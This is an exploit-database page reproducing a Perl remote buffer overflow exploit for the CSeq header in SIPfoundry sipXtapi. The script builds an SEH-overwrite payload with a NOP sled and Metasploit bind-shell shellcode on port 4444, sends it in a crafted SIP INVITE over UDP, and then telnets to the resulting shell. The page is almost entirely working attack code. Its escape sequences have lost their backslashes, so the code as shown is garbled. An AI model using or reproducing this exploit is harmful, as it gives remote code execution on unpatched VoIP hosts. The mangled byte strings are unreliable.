SIPfoundry sipXtapi (CSeq) Remote Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : SIPfoundry sipXtapi (CSeq) Remote Buffer Overflow Exploit
# Published : 2006-07-24
# Author : Jacopo Cervini
# Previous Title : AIM Triton 1.0.4 (SipXtapi) Remote Buffer Overflow Exploit (PoC)
# Next Title : Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability

#!/usr/bin/perl
# 
# Remote Buffer Overflow in sipXtapi
# 
# bad char 0x00 0x09 0x0a 0x0d 0x20
#


use IO::Socket;
#use strict;

print "nn";
print "sipXtapi original Exploit by Michael Thumann added a real shellcode by acaronn";
print "tested on sipXphone 2.6.0.27 read the code for ret addressnn";

if (not $ARGV[0]) {
        print "Usage: sipx.pl <host>n";
exit;}

$target=$ARGV[0];
my $source ="127.0.0.1";
my $target_port = 5060;
my $user ="bad";
my $nextseh = "xebx06x90x90";
my $seh="xb0x67x01x08";	# pop pop ret in jvm.dll for winxp Pro SP2 Italian universal ?
#my $seh="x27x13x02x08";	# call ebx in jvm.dll for win2k Pro SP0 Italian universal ?
#my $seh="x22x92x06x08";	# jmp ebx in jvm.dll for win2k Pro SP0 Italian universal ? 
				# if you use this ret you can exploits the target host many times
my $nop = "x90"x32;


# win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode = 
"x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x25".
"xe3xa5x9fx83xebxfcxe2xf4xd9x89x4exd2xcdx1ax5ax60".
"xdax83x2exf3x01xc7x2exdax19x68xd9x9ax5dxe2x4ax14".
"x6axfbx2exc0x05xe2x4exd6xaexd7x2ex9excbxd2x65x06".
"x89x67x65xebx22x22x6fx92x24x21x4ex6bx1exb7x81xb7".
"x50x06x2exc0x01xe2x4exf9xaexefxeex14x7axffxa4x74".
"x26xcfx2ex16x49xc7xb9xfexe6xd2x7exfbxaexa0x95x14".
"x65xefx2exefx39x4ex2exdfx2dxbdxcdx11x6bxedx49xcf".
"xdax35xc3xccx43x8bx96xadx4dx94xd6xadx7axb7x5ax4f".
"x4dx28x48x63x1exb3x5ax49x7ax6ax40xf9xa4x0exadx9d".
"x70x89xa7x60xf5x8bx7cx96xd0x4exf2x60xf3xb0xf6xcc".
"x76xb0xe6xccx66xb0x5ax4fx43x8bxb4xc3x43xb0x2cx7e".
"xb0x8bx01x85x55x24xf2x60xf3x89xb5xcex70x1cx75xf7".
"x81x4ex8bx76x72x1cx73xccx70x1cx75xf7xc0xaax23xd6".
"x72x1cx73xcfx71xb7xf0x60xf5x70xcdx78x5cx25xdcxc8".
"xdax35xf0x60xf5x85xcfxfbx43x8bxc6xf2xacx06xcfxcf".
"x7cxcax69x16xc2x89xe1x16xc7xd2x65x6cx8fx1dxe7xb2".
"xdbxa1x89x0cxa8x99x9dx34x8ex48xcdxedxdbx50xb3x60".
"x50xa7x5ax49x7exb4xf7xcex74xb2xcfx9ex74xb2xf0xce".
"xdax33xcdx32xfcxe6x6bxccxdax35xcfx60xdaxd4x5ax4f".
"xaexb4x59x1cxe1x87x5ax49x77x1cx75xf7xd5x69xa1xc0".
"x76x1cx73x60xf5xe3xa5x9f";
my $cseq =("x41"x204).$nextseh.$seh.$nop.$shellcode;


my $packet =<<END;
INVITE sip:user@$source SIP/2.0r
To: <sip:$target:$target_port>r
Via: SIP/2.0/UDP $target:3277r
From: "moz"<sip:$target:3277>r
Call-ID: 3121$targetr
CSeq: $cseqr
Max-Forwards: 70r
Contact: <sip:$source:5059>r
r
END

print "Sending Packet to: " . $target . "nn";
socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));
my $ipaddr = inet_aton($target);
my $sendto = sockaddr_in($target_port,$ipaddr);
send(PING, $packet, 0, $sendto) == length($packet) or die "cannot send to $target : $target_port : $!n";
print "Done.n";
$host = $ARGV[0];

print " + connect to $host on port 4444...n";

system("telnet $host 4444");

# www.Syue.com [2006-07-24]